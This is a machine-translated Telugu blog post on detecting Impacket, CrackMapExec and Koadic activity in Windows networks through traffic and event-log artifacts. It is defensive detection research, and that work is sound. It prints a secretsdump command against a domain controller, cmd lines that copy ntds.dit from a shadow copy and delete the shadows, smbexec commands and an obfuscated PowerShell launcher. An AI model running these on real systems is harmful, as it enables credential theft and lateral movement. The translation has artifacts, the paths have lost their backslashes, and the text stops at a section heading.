ప్రోహోస్టర్ > బ్లాగ్ > పరిపాలన > విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం

కార్పొరేట్ రంగంలో దాడుల సంఖ్య ప్రతి సంవత్సరం పెరుగుతోంది: ఉదాహరణకు 2017లో, 13% ఎక్కువ ప్రత్యేక సంఘటనలు నమోదయ్యాయి 2016లో కంటే, మరియు 2018 చివరి నాటికి - 27% ఎక్కువ సంఘటనలుమునుపటి కాలంలో కంటే. ప్రధాన పని సాధనం Windows ఆపరేటింగ్ సిస్టమ్ అయిన వాటితో సహా. 2017-2018లో, APT డ్రాగన్‌ఫ్లై, APT28, APT మడ్డీవాటర్ యూరప్, ఉత్తర అమెరికా మరియు సౌదీ అరేబియాలోని ప్రభుత్వ మరియు సైనిక సంస్థలపై దాడులు నిర్వహించింది. మరియు మేము దీని కోసం మూడు సాధనాలను ఉపయోగించాము - ఇంపాకెట్, క్రాక్ మ్యాప్ఎక్సెక్ и కోడిక్. వారి సోర్స్ కోడ్ తెరిచి ఉంది మరియు GitHubలో అందుబాటులో ఉంటుంది.

ఈ సాధనాలు ప్రాథమిక వ్యాప్తికి ఉపయోగించబడవని, మౌలిక సదుపాయాలలో దాడిని అభివృద్ధి చేయడానికి ఉపయోగించబడుతుందని గమనించాలి. దాడి చేసేవారు చుట్టుకొలత యొక్క చొచ్చుకుపోయిన తరువాత దాడి యొక్క వివిధ దశలలో వాటిని ఉపయోగిస్తారు. ఇది, మార్గం ద్వారా, గుర్తించడం కష్టం మరియు తరచుగా సాంకేతికత సహాయంతో మాత్రమే నెట్‌వర్క్ ట్రాఫిక్‌లో రాజీ జాడలను గుర్తించడం లేదా అనుమతించే సాధనాలు దాడి చేసే వ్యక్తి ఇన్‌ఫ్రాస్ట్రక్చర్‌లోకి ప్రవేశించిన తర్వాత అతని క్రియాశీల చర్యలను గుర్తించడం. సాధనాలు ఫైల్‌లను బదిలీ చేయడం నుండి రిజిస్ట్రీతో పరస్పర చర్య చేయడం మరియు రిమోట్ మెషీన్‌లో ఆదేశాలను అమలు చేయడం వరకు అనేక రకాల విధులను అందిస్తాయి. మేము ఈ సాధనాల నెట్‌వర్క్ కార్యాచరణను గుర్తించడానికి వాటిపై ఒక అధ్యయనాన్ని నిర్వహించాము.

మనం ఏమి చేయాల్సి వచ్చింది:

  • హ్యాకింగ్ సాధనాలు ఎలా పనిచేస్తాయో అర్థం చేసుకోండి. దాడి చేసేవారు ఎలాంటి దోపిడీ చేయాలనుకుంటున్నారో మరియు వారు ఏ సాంకేతికతలను ఉపయోగించవచ్చో కనుగొనండి.
  • దాడి యొక్క మొదటి దశలలో సమాచార భద్రతా సాధనాల ద్వారా కనుగొనబడని వాటిని కనుగొనండి. దాడి చేసే వ్యక్తి అంతర్గత దాడి చేసే వ్యక్తి అయినందున లేదా దాడి చేసే వ్యక్తి ఇంతకు ముందు తెలియని ఇన్‌ఫ్రాస్ట్రక్చర్‌ను ఉపయోగించుకుంటున్నందున నిఘా దశ దాటవేయబడవచ్చు. అతని చర్యల మొత్తం గొలుసును పునరుద్ధరించడం సాధ్యమవుతుంది, అందువల్ల మరింత కదలికను గుర్తించాలనే కోరిక.
  • చొరబాటు గుర్తింపు సాధనాల నుండి తప్పుడు పాజిటివ్‌లను తొలగించండి. కేవలం నిఘా ఆధారంగా కొన్ని చర్యలు గుర్తించబడినప్పుడు, తరచుగా లోపాలు సాధ్యమవుతాయని మనం మర్చిపోకూడదు. సాధారణంగా ఇన్‌ఫ్రాస్ట్రక్చర్‌లో ఏదైనా సమాచారాన్ని పొందేందుకు, మొదటి చూపులో చట్టబద్ధమైన వాటి నుండి వేరు చేయలేని అనేక మార్గాలు ఉన్నాయి.

ఈ సాధనాలు దాడి చేసేవారికి ఏమి అందిస్తాయి? ఇది ఇంపాకెట్ అయితే, దాడి చేసేవారు చుట్టుకొలతను విచ్ఛిన్నం చేసిన తర్వాత వచ్చే దాడి యొక్క వివిధ దశలలో ఉపయోగించగల మాడ్యూల్స్ యొక్క పెద్ద లైబ్రరీని అందుకుంటారు. అనేక సాధనాలు అంతర్గతంగా ఇంపాకెట్ మాడ్యూళ్లను ఉపయోగిస్తాయి - ఉదాహరణకు, Metasploit. ఇది రిమోట్ కమాండ్ ఎగ్జిక్యూషన్ కోసం dcomexec మరియు wmiexec, Impacket నుండి జోడించబడిన మెమరీ నుండి ఖాతాలను పొందడానికి సీక్రెట్స్‌డంప్‌లను కలిగి ఉంది. ఫలితంగా, అటువంటి లైబ్రరీ యొక్క కార్యాచరణ యొక్క సరైన గుర్తింపు ఉత్పన్నాల గుర్తింపును నిర్ధారిస్తుంది.

CrackMapExec (లేదా కేవలం CME) గురించి సృష్టికర్తలు "పవర్డ్ బై ఇంపాకెట్" అని వ్రాయడం యాదృచ్చికం కాదు. అదనంగా, CME జనాదరణ పొందిన దృశ్యాల కోసం రెడీమేడ్ కార్యాచరణను కలిగి ఉంది: పాస్‌వర్డ్‌లు లేదా వాటి హాష్‌లను పొందడం కోసం మిమికాట్జ్, రిమోట్ ఎగ్జిక్యూషన్ కోసం మీటర్‌ప్రెటర్ లేదా ఎంపైర్ ఏజెంట్‌ను అమలు చేయడం మరియు బ్లడ్‌హౌండ్ బోర్డులో.

మేము ఎంచుకున్న మూడవ సాధనం కోడిక్. ఇది చాలా ఇటీవలిది, ఇది 25లో అంతర్జాతీయ హ్యాకర్ కాన్ఫరెన్స్ DEFCON 2017లో ప్రదర్శించబడింది మరియు ఇది ప్రామాణికం కాని విధానం ద్వారా వేరు చేయబడింది: ఇది HTTP, జావా స్క్రిప్ట్ మరియు మైక్రోసాఫ్ట్ విజువల్ బేసిక్ స్క్రిప్ట్ (VBS) ద్వారా పని చేస్తుంది. ఈ విధానాన్ని లివింగ్ ఆఫ్ ది ల్యాండ్ అంటారు: సాధనం విండోస్‌లో నిర్మించిన డిపెండెన్సీలు మరియు లైబ్రరీల సమితిని ఉపయోగిస్తుంది. సృష్టికర్తలు దీనిని COM కమాండ్ & కంట్రోల్ లేదా C3 అని పిలుస్తారు.

ఇంపాకెట్

ఇంపాకెట్ యొక్క కార్యాచరణ చాలా విస్తృతమైనది, AD లోపల నిఘా మరియు అంతర్గత MS SQL సర్వర్‌ల నుండి డేటాను సేకరించడం, ఆధారాలను పొందే సాంకేతికతల వరకు: ఇది ఒక SMB రిలే దాడి మరియు డొమైన్ కంట్రోలర్ నుండి యూజర్ పాస్‌వర్డ్‌ల హాష్‌లను కలిగి ఉన్న ntds.dit ఫైల్‌ను పొందడం. ఇంపాకెట్ నాలుగు విభిన్న పద్ధతులను ఉపయోగించి రిమోట్‌గా ఆదేశాలను అమలు చేస్తుంది: WMI, Windows షెడ్యూలర్ మేనేజ్‌మెంట్ సర్వీస్, DCOM మరియు SMB, మరియు అలా చేయడానికి ఆధారాలు అవసరం.

సీక్రెట్స్‌డంప్

సీక్రెట్స్‌డంప్‌ని పరిశీలిద్దాం. ఇది వినియోగదారు మెషీన్‌లు మరియు డొమైన్ కంట్రోలర్‌లను లక్ష్యంగా చేసుకోగల మాడ్యూల్. ఇది మెమరీ ప్రాంతాలైన LSA, SAM, SECURITY, NTDS.dit కాపీలను పొందేందుకు ఉపయోగించబడుతుంది, కాబట్టి ఇది దాడి యొక్క వివిధ దశలలో చూడవచ్చు. మాడ్యూల్ యొక్క ఆపరేషన్‌లో మొదటి దశ SMB ద్వారా ప్రామాణీకరణ, దీనికి వినియోగదారు పాస్‌వర్డ్ లేదా దాని హాష్ స్వయంచాలకంగా పాస్ ది హాష్ దాడిని నిర్వహించడం అవసరం. తర్వాత సర్వీస్ కంట్రోల్ మేనేజర్ (SCM)కి యాక్సెస్‌ని తెరవమని మరియు winreg ప్రోటోకాల్ ద్వారా రిజిస్ట్రీకి యాక్సెస్‌ను పొందమని అభ్యర్థన వస్తుంది, దీన్ని ఉపయోగించి దాడి చేసే వ్యక్తి ఆసక్తి ఉన్న శాఖల డేటాను కనుగొని SMB ద్వారా ఫలితాలను పొందవచ్చు.

అంజీర్లో. 1 Winreg ప్రోటోకాల్‌ను ఉపయోగిస్తున్నప్పుడు, LSAతో రిజిస్ట్రీ కీని ఉపయోగించి యాక్సెస్ ఎలా పొందబడుతుందో మనం చూస్తాము. దీన్ని చేయడానికి, opcode 15 - OpenKeyతో DCERPC ఆదేశాన్ని ఉపయోగించండి.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 1. Winreg ప్రోటోకాల్ ఉపయోగించి రిజిస్ట్రీ కీని తెరవడం

తర్వాత, కీకి ప్రాప్యత పొందినప్పుడు, విలువలు opcode 20తో SaveKey కమాండ్‌తో సేవ్ చేయబడతాయి. ఇంపాకెట్ దీన్ని చాలా నిర్దిష్ట మార్గంలో చేస్తుంది. ఇది .tmpతో జతచేయబడిన 8 యాదృచ్ఛిక అక్షరాల స్ట్రింగ్ పేరు ఉన్న ఫైల్‌కి విలువలను సేవ్ చేస్తుంది. అదనంగా, ఈ ఫైల్ యొక్క మరింత అప్‌లోడ్ System32 డైరెక్టరీ నుండి SMB ద్వారా జరుగుతుంది (Fig. 2).

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 2. రిమోట్ మెషీన్ నుండి రిజిస్ట్రీ కీని పొందే పథకం

విన్‌రెగ్ ప్రోటోకాల్, నిర్దిష్ట పేర్లు, ఆదేశాలు మరియు వాటి క్రమాన్ని ఉపయోగించి కొన్ని రిజిస్ట్రీ శాఖలకు ప్రశ్నల ద్వారా నెట్‌వర్క్‌లో ఇటువంటి కార్యాచరణను గుర్తించవచ్చని ఇది మారుతుంది.

ఈ మాడ్యూల్ విండోస్ ఈవెంట్ లాగ్‌లో జాడలను కూడా వదిలివేస్తుంది, ఇది గుర్తించడం సులభం చేస్తుంది. ఉదాహరణకు, ఆదేశాన్ని అమలు చేయడం వల్ల

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

విండోస్ సర్వర్ 2016 లాగ్‌లో మేము ఈ క్రింది ఈవెంట్‌ల కీలక క్రమాన్ని చూస్తాము:

1. 4624 - రిమోట్ లాగిన్.
2. 5145 - winreg రిమోట్ సేవకు యాక్సెస్ హక్కులను తనిఖీ చేస్తోంది.
3. 5145 - System32 డైరెక్టరీలో ఫైల్ యాక్సెస్ హక్కులను తనిఖీ చేస్తోంది. ఫైల్ పైన పేర్కొన్న యాదృచ్ఛిక పేరు ఉంది.
4. 4688 - vssadmin ప్రారంభించే cmd.exe ప్రక్రియను సృష్టించడం:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ఆదేశంతో ఒక ప్రక్రియను సృష్టించడం:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ఆదేశంతో ఒక ప్రక్రియను సృష్టించడం:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ఆదేశంతో ఒక ప్రక్రియను సృష్టించడం:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

అనేక పోస్ట్-ఎక్స్‌ప్లోయిటేషన్ టూల్స్ లాగా, ఇంపాకెట్ రిమోట్‌గా ఆదేశాలను అమలు చేయడానికి మాడ్యూల్‌లను కలిగి ఉంది. మేము రిమోట్ మెషీన్‌లో ఇంటరాక్టివ్ కమాండ్ షెల్‌ను అందించే smbexec పై దృష్టి పెడతాము. ఈ మాడ్యూల్‌కి పాస్‌వర్డ్ లేదా పాస్‌వర్డ్ హాష్‌తో SMB ద్వారా ప్రమాణీకరణ కూడా అవసరం. అంజీర్లో. మూర్తి 3 లో అటువంటి సాధనం ఎలా పనిచేస్తుందో మనం ఒక ఉదాహరణ చూస్తాము, ఈ సందర్భంలో ఇది స్థానిక నిర్వాహక కన్సోల్.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 3. ఇంటరాక్టివ్ smbexec కన్సోల్

ధృవీకరణ తర్వాత smbexec యొక్క మొదటి దశ OpenSCManagerW కమాండ్ (15)తో SCMని తెరవడం. ప్రశ్న గుర్తించదగినది: MachineName ఫీల్డ్ డమ్మీ.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 4. సర్వీస్ కంట్రోల్ మేనేజర్‌ని తెరవడానికి అభ్యర్థన

తరువాత, CreateServiceW కమాండ్ (12) ఉపయోగించి సేవ సృష్టించబడుతుంది. smbexec విషయంలో, మేము ప్రతిసారీ అదే కమాండ్ నిర్మాణ లాజిక్‌ను చూడవచ్చు. అంజీర్లో. 5 ఆకుపచ్చ రంగు మార్చలేని కమాండ్ పారామితులను సూచిస్తుంది, పసుపు దాడి చేసే వ్యక్తి ఏమి మార్చగలదో సూచిస్తుంది. ఎక్జిక్యూటబుల్ ఫైల్ పేరు, దాని డైరెక్టరీ మరియు అవుట్‌పుట్ ఫైల్‌ను మార్చవచ్చని చూడటం చాలా సులభం, అయితే ఇంపాకెట్ మాడ్యూల్ యొక్క లాజిక్‌కు భంగం కలిగించకుండా మిగిలిన వాటిని మార్చడం చాలా కష్టం.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 5. సర్వీస్ కంట్రోల్ మేనేజర్‌ని ఉపయోగించి సేవను సృష్టించడానికి అభ్యర్థన

Smbexec Windows ఈవెంట్ లాగ్‌లో స్పష్టమైన జాడలను కూడా వదిలివేస్తుంది. ipconfig కమాండ్‌తో ఇంటరాక్టివ్ కమాండ్ షెల్ కోసం Windows Server 2016 లాగ్‌లో, మేము ఈ క్రింది ఈవెంట్‌ల కీ క్రమాన్ని చూస్తాము:

1. 4697 — బాధితుని మెషీన్‌లో సేవ యొక్క సంస్థాపన:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - పాయింట్ 1 నుండి వాదనలతో cmd.exe ప్రక్రియ యొక్క సృష్టి.
3. 5145 - C$ డైరెక్టరీలో __ అవుట్‌పుట్ ఫైల్‌కి యాక్సెస్ హక్కులను తనిఖీ చేస్తోంది.
4. 4697 - బాధితుని మెషీన్లో సేవ యొక్క సంస్థాపన.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - పాయింట్ 4 నుండి వాదనలతో cmd.exe ప్రక్రియ యొక్క సృష్టి.
6. 5145 - C$ డైరెక్టరీలో __ అవుట్‌పుట్ ఫైల్‌కి యాక్సెస్ హక్కులను తనిఖీ చేస్తోంది.

దాడి సాధనాల అభివృద్ధికి ఇంపాకెట్ ఆధారం. ఇది విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌లోని దాదాపు అన్ని ప్రోటోకాల్‌లకు మద్దతు ఇస్తుంది మరియు అదే సమయంలో దాని స్వంత లక్షణ లక్షణాలను కలిగి ఉంటుంది. ఇక్కడ నిర్దిష్ట winreg అభ్యర్థనలు మరియు లక్షణ కమాండ్ నిర్మాణంతో SCM API ఉపయోగం మరియు ఫైల్ పేరు ఫార్మాట్ మరియు SMB భాగస్వామ్యం SYSTEM32.

CRACKMAPEXEC

CME సాధనం ప్రధానంగా నెట్‌వర్క్‌లో ముందుకు సాగడానికి దాడి చేసే వ్యక్తి చేయాల్సిన సాధారణ చర్యలను ఆటోమేట్ చేయడానికి రూపొందించబడింది. ఇది బాగా తెలిసిన ఎంపైర్ ఏజెంట్ మరియు మీటర్‌ప్రెటర్‌తో కలిసి పని చేయడానికి మిమ్మల్ని అనుమతిస్తుంది. ఆదేశాలను రహస్యంగా అమలు చేయడానికి, CME వాటిని అస్పష్టం చేస్తుంది. బ్లడ్‌హౌండ్ (ప్రత్యేక నిఘా సాధనం) ఉపయోగించి, దాడి చేసే వ్యక్తి యాక్టివ్ డొమైన్ అడ్మినిస్ట్రేటర్ సెషన్ కోసం శోధనను ఆటోమేట్ చేయవచ్చు.

బ్లడ్హౌండ్

బ్లడ్‌హౌండ్, స్వతంత్ర సాధనంగా, నెట్‌వర్క్‌లో అధునాతన నిఘా కోసం అనుమతిస్తుంది. ఇది వినియోగదారులు, యంత్రాలు, సమూహాలు, సెషన్‌ల గురించి డేటాను సేకరిస్తుంది మరియు పవర్‌షెల్ స్క్రిప్ట్ లేదా బైనరీ ఫైల్‌గా సరఫరా చేయబడుతుంది. సమాచారాన్ని సేకరించేందుకు LDAP లేదా SMB-ఆధారిత ప్రోటోకాల్‌లు ఉపయోగించబడతాయి. CME ఇంటిగ్రేషన్ మాడ్యూల్ బ్లడ్‌హౌండ్‌ను బాధితుడి మెషీన్‌కు డౌన్‌లోడ్ చేయడానికి అనుమతిస్తుంది, అమలు చేసిన తర్వాత సేకరించిన డేటాను అమలు చేసి స్వీకరించండి, తద్వారా సిస్టమ్‌లోని చర్యలను ఆటోమేట్ చేస్తుంది మరియు వాటిని తక్కువ గుర్తించదగినదిగా చేస్తుంది. బ్లడ్‌హౌండ్ గ్రాఫికల్ షెల్ సేకరించిన డేటాను గ్రాఫ్‌ల రూపంలో అందిస్తుంది, ఇది దాడి చేసేవారి మెషీన్ నుండి డొమైన్ అడ్మినిస్ట్రేటర్‌కు అతి తక్కువ మార్గాన్ని కనుగొనడానికి మిమ్మల్ని అనుమతిస్తుంది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 6. బ్లడ్‌హౌండ్ ఇంటర్‌ఫేస్

బాధితుని మెషీన్‌లో అమలు చేయడానికి, మాడ్యూల్ ATSVC మరియు SMBని ఉపయోగించి ఒక పనిని సృష్టిస్తుంది. ATSVC అనేది విండోస్ టాస్క్ షెడ్యూలర్‌తో పని చేయడానికి ఒక ఇంటర్‌ఫేస్. CME నెట్‌వర్క్‌లో టాస్క్‌లను సృష్టించడానికి దాని NetrJobAdd(1) ఫంక్షన్‌ని ఉపయోగిస్తుంది. CME మాడ్యూల్ పంపే దానికి ఉదాహరణ అంజీర్‌లో చూపబడింది. 7: ఇది cmd.exe కమాండ్ కాల్ మరియు XML ఫార్మాట్‌లో వాదనల రూపంలో అస్పష్టమైన కోడ్.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
Fig.7. CME ద్వారా టాస్క్‌ను సృష్టిస్తోంది

విధిని అమలు చేయడానికి సమర్పించిన తర్వాత, బాధితుడి యంత్రం స్వయంగా బ్లడ్‌హౌండ్‌ను ప్రారంభిస్తుంది మరియు ఇది ట్రాఫిక్‌లో చూడవచ్చు. మాడ్యూల్ ప్రామాణిక సమూహాలను, డొమైన్‌లోని అన్ని యంత్రాలు మరియు వినియోగదారుల జాబితాను పొందేందుకు మరియు SRVSVC NetSessEnum అభ్యర్థన ద్వారా క్రియాశీల వినియోగదారు సెషన్‌ల గురించి సమాచారాన్ని పొందేందుకు LDAP ప్రశ్నల ద్వారా వర్గీకరించబడుతుంది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 8. SMB ద్వారా సక్రియ సెషన్‌ల జాబితాను పొందడం

అదనంగా, ఆడిటింగ్ ప్రారంభించబడిన బాధితుల మెషీన్‌లో బ్లడ్‌హౌండ్‌ను ప్రారంభించడం ID 4688 (ప్రాసెస్ క్రియేషన్) మరియు ప్రాసెస్ పేరుతో ఒక ఈవెంట్‌తో పాటుగా ఉంటుంది. «C:WindowsSystem32cmd.exe». కమాండ్ లైన్ ఆర్గ్యుమెంట్‌లు ఇందులో గుర్తించదగినవి:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts మాడ్యూల్ ఫంక్షనాలిటీ మరియు ఇంప్లిమెంటేషన్ కోణం నుండి చాలా ఆసక్తికరంగా ఉంటుంది. వివిధ విండోస్ ఆబ్జెక్ట్‌ల నుండి డేటాను తిరిగి పొందడానికి WQL ప్రశ్న భాషను ఉపయోగించడానికి WMI మిమ్మల్ని అనుమతిస్తుంది, ఇది తప్పనిసరిగా ఈ CME మాడ్యూల్ ఉపయోగిస్తుంది. ఇది బాధితుడి మెషీన్‌లో ఇన్‌స్టాల్ చేయబడిన రక్షణ సాధనాల గురించి యాంటీస్పైవేర్‌ప్రొడక్ట్ మరియు యాంటీమైరస్‌ప్రొడక్ట్ తరగతులకు ప్రశ్నలను రూపొందిస్తుంది. అవసరమైన డేటాను పొందేందుకు, మాడ్యూల్ rootSecurityCenter2 నేమ్‌స్పేస్‌కు కనెక్ట్ చేయబడుతుంది, ఆపై WQL ప్రశ్నను ఉత్పత్తి చేస్తుంది మరియు ప్రతిస్పందనను పొందుతుంది. అంజీర్లో. మూర్తి 9 అటువంటి అభ్యర్థనలు మరియు ప్రతిస్పందనల విషయాలను చూపుతుంది. మా ఉదాహరణలో, Windows డిఫెండర్ కనుగొనబడింది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 9. enum_avproducts మాడ్యూల్ యొక్క నెట్‌వర్క్ కార్యాచరణ

తరచుగా, WMI ఆడిటింగ్ (ట్రేస్ WMI-యాక్టివిటీ), దీని ఈవెంట్‌లలో మీరు WQL ప్రశ్నల గురించి ఉపయోగకరమైన సమాచారాన్ని కనుగొనవచ్చు, నిలిపివేయబడవచ్చు. కానీ అది ప్రారంభించబడితే, enum_avproducts స్క్రిప్ట్ అమలు చేయబడితే, ID 11తో ఈవెంట్ సేవ్ చేయబడుతుంది. ఇది అభ్యర్థనను పంపిన వినియోగదారు పేరు మరియు rootSecurityCenter2 నేమ్‌స్పేస్‌లో పేరును కలిగి ఉంటుంది.

ప్రతి CME మాడ్యూల్‌లు దాని స్వంత కళాఖండాలను కలిగి ఉంటాయి, అది నిర్దిష్ట WQL ప్రశ్నలు లేదా LDAP మరియు SMBలలో అస్పష్టత మరియు బ్లడ్‌హౌండ్-నిర్దిష్ట కార్యాచరణతో టాస్క్ షెడ్యూలర్‌లో నిర్దిష్ట రకమైన పనిని సృష్టించడం.

KOADIC

కోడిక్ యొక్క విలక్షణమైన లక్షణం Windowsలో నిర్మించిన జావాస్క్రిప్ట్ మరియు VBScript వ్యాఖ్యాతల ఉపయోగం. ఈ కోణంలో, ఇది ల్యాండ్ ట్రెండ్‌ను అనుసరిస్తుంది - అంటే, దీనికి బాహ్య డిపెండెన్సీలు లేవు మరియు ప్రామాణిక విండోస్ సాధనాలను ఉపయోగిస్తుంది. ఇది పూర్తి కమాండ్ & కంట్రోల్ (CnC) కోసం ఒక సాధనం, ఎందుకంటే ఇన్‌ఫెక్షన్ తర్వాత మెషీన్‌లో “ఇంప్లాంట్” ఇన్‌స్టాల్ చేయబడి, దానిని నియంత్రించడానికి అనుమతిస్తుంది. అటువంటి యంత్రాన్ని కోడిక్ పరిభాషలో "జోంబీ" అని పిలుస్తారు. బాధితుని వైపు పూర్తి ఆపరేషన్ కోసం తగిన అధికారాలు లేకుంటే, వినియోగదారు ఖాతా నియంత్రణ బైపాస్ (UAC బైపాస్) పద్ధతులను ఉపయోగించి కోడిక్ వాటిని పెంచే సామర్థ్యాన్ని కలిగి ఉంటుంది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 10. కోడిక్ షెల్

బాధితుడు తప్పనిసరిగా కమాండ్ & కంట్రోల్ సర్వర్‌తో కమ్యూనికేషన్‌ను ప్రారంభించాలి. దీన్ని చేయడానికి, ఆమె గతంలో సిద్ధం చేసిన URIని సంప్రదించాలి మరియు స్టేజర్‌లలో ఒకదానిని ఉపయోగించి ప్రధాన కోడిక్ బాడీని అందుకోవాలి. అంజీర్లో. మూర్తి 11 mshta స్టేజర్ కోసం ఒక ఉదాహరణను చూపుతుంది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 11. CnC సర్వర్‌తో సెషన్‌ను ప్రారంభించడం

ప్రతిస్పందన వేరియబుల్ WS ఆధారంగా, WScript.Shell ద్వారా అమలు జరుగుతుందని స్పష్టమవుతుంది మరియు STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE వేరియబుల్స్ ప్రస్తుత సెషన్ యొక్క పారామితుల గురించి కీలక సమాచారాన్ని కలిగి ఉంటాయి. CnC సర్వర్‌తో HTTP కనెక్షన్‌లో ఇది మొదటి అభ్యర్థన-ప్రతిస్పందన జత. తదుపరి అభ్యర్థనలు నేరుగా పిలువబడే మాడ్యూల్స్ (ఇంప్లాంట్లు) యొక్క కార్యాచరణకు సంబంధించినవి. అన్ని కోడిక్ మాడ్యూల్స్ CnCతో సక్రియ సెషన్‌తో మాత్రమే పని చేస్తాయి.

Mimikatz

CME బ్లడ్‌హౌండ్‌తో పని చేసినట్లే, కోడిక్ మిమికాట్జ్‌తో ఒక ప్రత్యేక ప్రోగ్రామ్‌గా పనిచేస్తుంది మరియు దీన్ని ప్రారంభించడానికి అనేక మార్గాలు ఉన్నాయి. మిమికాట్జ్ ఇంప్లాంట్‌ని డౌన్‌లోడ్ చేయడానికి అభ్యర్థన-ప్రతిస్పందన జత క్రింద ఉంది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 12. మిమికాట్జ్‌ని కోడిక్‌కి బదిలీ చేయండి

అభ్యర్థనలో URI ఫార్మాట్ ఎలా మారిందో మీరు చూడవచ్చు. ఇది ఇప్పుడు csrf వేరియబుల్ కోసం ఒక విలువను కలిగి ఉంది, ఇది ఎంచుకున్న మాడ్యూల్‌కు బాధ్యత వహిస్తుంది. ఆమె పేరుకు శ్రద్ధ చూపవద్దు; CSRFని సాధారణంగా విభిన్నంగా అర్థం చేసుకుంటారని మనందరికీ తెలుసు. ప్రతిస్పందన కోడిక్ యొక్క అదే ప్రధాన భాగం, దీనికి మిమికాట్జ్‌కి సంబంధించిన కోడ్ జోడించబడింది. ఇది చాలా పెద్దది, కాబట్టి కీ పాయింట్లను చూద్దాం. ఇక్కడ మేము Mimikatz లైబ్రరీని బేస్64లో ఎన్‌కోడ్ చేసాము, దానిని ఇంజెక్ట్ చేసే సీరియలైజ్డ్ .NET క్లాస్ మరియు Mimikatz లాంచ్ చేయడానికి వాదనలు ఉన్నాయి. అమలు ఫలితం నెట్‌వర్క్ ద్వారా స్పష్టమైన వచనంలో ప్రసారం చేయబడుతుంది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 13. రిమోట్ మెషీన్‌లో మిమికాట్జ్‌ని అమలు చేయడం వల్ల ఫలితం

Exec_cmd

